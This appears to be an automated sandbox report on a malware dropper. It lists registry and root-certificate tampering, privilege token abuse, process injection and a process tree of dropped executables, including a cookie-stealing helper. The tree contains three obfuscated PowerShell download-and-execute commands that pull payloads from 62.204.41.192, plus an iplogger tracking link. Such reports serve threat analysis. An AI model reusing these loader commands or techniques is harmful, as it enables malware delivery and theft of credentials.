Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	Info.exe

Modifies registry class 4 IoCs

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

iHngxU3cVgjssPChkVvEa8FV.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	iHngxU3cVgjssPChkVvEa8FV.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	iHngxU3cVgjssPChkVvEa8FV.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

CompPkgSrv.exemsedge.exepub2.exemsedge.exe

pid	process
3068	CompPkgSrv.exe
3068	CompPkgSrv.exe
1020	msedge.exe
1020	msedge.exe
3688	pub2.exe
3688	pub2.exe
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
780	msedge.exe
780	msedge.exe
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428
2428

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

3688 pub2.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid process

780 msedge.exe
780 msedge.exe
780 msedge.exe
780 msedge.exe

pid	process
3688	pub2.exe

pid	process
780	msedge.exe
780	msedge.exe
780	msedge.exe
780	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

KRSetp.exeInstall.exetaskkill.exemd9_1sjm.exeInfo.exeInfo.execsrss.exe

description	pid	process
Token: SeDebugPrivilege	3728	KRSetp.exe
Token: SeCreateTokenPrivilege	3416	Install.exe
Token: SeAssignPrimaryTokenPrivilege	3416	Install.exe
Token: SeLockMemoryPrivilege	3416	Install.exe
Token: SeIncreaseQuotaPrivilege	3416	Install.exe
Token: SeMachineAccountPrivilege	3416	Install.exe
Token: SeTcbPrivilege	3416	Install.exe
Token: SeSecurityPrivilege	3416	Install.exe
Token: SeTakeOwnershipPrivilege	3416	Install.exe
Token: SeLoadDriverPrivilege	3416	Install.exe
Token: SeSystemProfilePrivilege	3416	Install.exe
Token: SeSystemtimePrivilege	3416	Install.exe
Token: SeProfSingleProcessPrivilege	3416	Install.exe
Token: SeIncBasePriorityPrivilege	3416	Install.exe
Token: SeCreatePagefilePrivilege	3416	Install.exe
Token: SeCreatePermanentPrivilege	3416	Install.exe
Token: SeBackupPrivilege	3416	Install.exe
Token: SeRestorePrivilege	3416	Install.exe
Token: SeShutdownPrivilege	3416	Install.exe
Token: SeDebugPrivilege	3416	Install.exe
Token: SeAuditPrivilege	3416	Install.exe
Token: SeSystemEnvironmentPrivilege	3416	Install.exe
Token: SeChangeNotifyPrivilege	3416	Install.exe
Token: SeRemoteShutdownPrivilege	3416	Install.exe
Token: SeUndockPrivilege	3416	Install.exe
Token: SeSyncAgentPrivilege	3416	Install.exe
Token: SeEnableDelegationPrivilege	3416	Install.exe
Token: SeManageVolumePrivilege	3416	Install.exe
Token: SeImpersonatePrivilege	3416	Install.exe
Token: SeCreateGlobalPrivilege	3416	Install.exe
Token: 31	3416	Install.exe
Token: 32	3416	Install.exe
Token: 33	3416	Install.exe
Token: 34	3416	Install.exe
Token: 35	3416	Install.exe
Token: SeDebugPrivilege	3556	taskkill.exe
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeManageVolumePrivilege	2016	md9_1sjm.exe
Token: SeDebugPrivilege	1488	Info.exe
Token: SeImpersonatePrivilege	1488	Info.exe
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeManageVolumePrivilege	2016	md9_1sjm.exe
Token: SeSystemEnvironmentPrivilege	4348	Info.exe
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeManageVolumePrivilege	2016	md9_1sjm.exe
Token: SeSystemEnvironmentPrivilege	4496	csrss.exe
Token: SeManageVolumePrivilege	2016	md9_1sjm.exe
Token: SeManageVolumePrivilege	2016	md9_1sjm.exe
Token: SeShutdownPrivilege	2428
Token: SeCreatePagefilePrivilege	2428
Token: SeShutdownPrivilege	2428

Suspicious use of FindShellTrayWindow 24 IoCs

Processes:

mysetold.exemsedge.exeAccostarmi.exe.pif

pid	process
1668	mysetold.exe
1668	mysetold.exe
1668	mysetold.exe
1668	mysetold.exe
1668	mysetold.exe
1668	mysetold.exe
1668	mysetold.exe
1668	mysetold.exe
780	msedge.exe
1668	mysetold.exe
1668	mysetold.exe
2428
780	msedge.exe
2428
2428
2428
2428
4952	Accostarmi.exe.pif
2428
2428
4952	Accostarmi.exe.pif
4952	Accostarmi.exe.pif
2428
2428

Suspicious use of SendNotifyMessage 13 IoCs

Processes:

mysetold.exeAccostarmi.exe.pif

pid	process
1668	mysetold.exe
1668	mysetold.exe
1668	mysetold.exe
1668	mysetold.exe
1668	mysetold.exe
1668	mysetold.exe
1668	mysetold.exe
1668	mysetold.exe
1668	mysetold.exe
1668	mysetold.exe
4952	Accostarmi.exe.pif
4952	Accostarmi.exe.pif
4952	Accostarmi.exe.pif

Suspicious use of SetWindowsHookEx 17 IoCs

Processes:

Installation.exeComplete.exeO3bWtVFAnzUgWoGX7TAzOKBX.exe_mYP_tSnTOgnjgNLP3W4DIHR.exeyan6zjgcFq6Syhr4zEseTjOJ.exeiHngxU3cVgjssPChkVvEa8FV.exeConhost.exezXdDEVf7mamOqjSI5Tpcby_y.exepJglbkrSsOdYPwGyoMpuG8tW.exeWerFault.exelzticJq7_775LC6cTkVFZRk4.exef6NbhqzbGjqSK_FWGRvOtGn6.exefnH4cP5IPLpAsOqwykBYFrXU.exeInstall.exeInstall.exeAccostarmi.exe.pif

pid	process
1188	Installation.exe
3284	Complete.exe
3700	O3bWtVFAnzUgWoGX7TAzOKBX.exe
5036	_mYP_tSnTOgnjgNLP3W4DIHR.exe
3776	yan6zjgcFq6Syhr4zEseTjOJ.exe
868	iHngxU3cVgjssPChkVvEa8FV.exe
2944	Conhost.exe
4900	zXdDEVf7mamOqjSI5Tpcby_y.exe
5060	pJglbkrSsOdYPwGyoMpuG8tW.exe
3728	WerFault.exe
3728	WerFault.exe
1820	lzticJq7_775LC6cTkVFZRk4.exe
2140	f6NbhqzbGjqSK_FWGRvOtGn6.exe
5028	fnH4cP5IPLpAsOqwykBYFrXU.exe
3408	Install.exe
5588	Install.exe
4952	Accostarmi.exe.pif

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exeFiles.exeFolder.exemsedge.exeInstall.exe

description	pid	process	target process
PID 2096 wrote to memory of 2472	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	Files.exe
PID 2096 wrote to memory of 2472	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	Files.exe
PID 2096 wrote to memory of 2472	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	Files.exe
PID 2096 wrote to memory of 3728	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	KRSetp.exe
PID 2096 wrote to memory of 3728	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	KRSetp.exe
PID 2472 wrote to memory of 2948	2472	Files.exe	jfiag3g_gg.exe
PID 2472 wrote to memory of 2948	2472	Files.exe	jfiag3g_gg.exe
PID 2472 wrote to memory of 2948	2472	Files.exe	jfiag3g_gg.exe
PID 2096 wrote to memory of 780	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	msedge.exe
PID 2096 wrote to memory of 780	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	msedge.exe
PID 2096 wrote to memory of 3416	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	Install.exe
PID 2096 wrote to memory of 3416	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	Install.exe
PID 2096 wrote to memory of 3416	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	Install.exe
PID 2096 wrote to memory of 3560	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	Folder.exe
PID 2096 wrote to memory of 3560	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	Folder.exe
PID 2096 wrote to memory of 3560	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	Folder.exe
PID 3560 wrote to memory of 748	3560	Folder.exe	Folder.exe
PID 3560 wrote to memory of 748	3560	Folder.exe	Folder.exe
PID 3560 wrote to memory of 748	3560	Folder.exe	Folder.exe
PID 2096 wrote to memory of 1488	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	Info.exe
PID 2096 wrote to memory of 1488	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	Info.exe
PID 2096 wrote to memory of 1488	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	Info.exe
PID 2096 wrote to memory of 1188	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	Installation.exe
PID 2096 wrote to memory of 1188	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	Installation.exe
PID 2096 wrote to memory of 1188	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	Installation.exe
PID 780 wrote to memory of 1732	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 1732	780	msedge.exe	msedge.exe
PID 2096 wrote to memory of 3688	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	pub2.exe
PID 2096 wrote to memory of 3688	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	pub2.exe
PID 2096 wrote to memory of 3688	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	pub2.exe
PID 2096 wrote to memory of 1668	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	mysetold.exe
PID 2096 wrote to memory of 1668	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	mysetold.exe
PID 2096 wrote to memory of 1668	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	mysetold.exe
PID 2096 wrote to memory of 2016	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	md9_1sjm.exe
PID 2096 wrote to memory of 2016	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	md9_1sjm.exe
PID 2096 wrote to memory of 2016	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	md9_1sjm.exe
PID 2096 wrote to memory of 3284	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	Complete.exe
PID 2096 wrote to memory of 3284	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	Complete.exe
PID 2096 wrote to memory of 3284	2096	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe	Complete.exe
PID 3416 wrote to memory of 1752	3416	Install.exe	cmd.exe
PID 3416 wrote to memory of 1752	3416	Install.exe	cmd.exe
PID 3416 wrote to memory of 1752	3416	Install.exe	cmd.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe
PID 780 wrote to memory of 2564	780	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe
"C:\Users\Admin\AppData\Local\Temp\6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2096

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2472

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:2948

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
PID:3068

C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3728

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
PID:4596

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:5404

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/NAN.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
PID:5232

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
PID:6072

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
PID:6024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 300
5⤵
- Program crash
PID:4864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/NON.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
3⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Checks processor information in registry
PID:5296

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7
2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd4,0x108,0x7ffb5c4c46f8,0x7ffb5c4c4708,0x7ffb5c4c4718
3⤵
PID:1732

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2220,11790699113925313211,7907185333462347596,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:8
3⤵
PID:3420

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2220,11790699113925313211,7907185333462347596,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
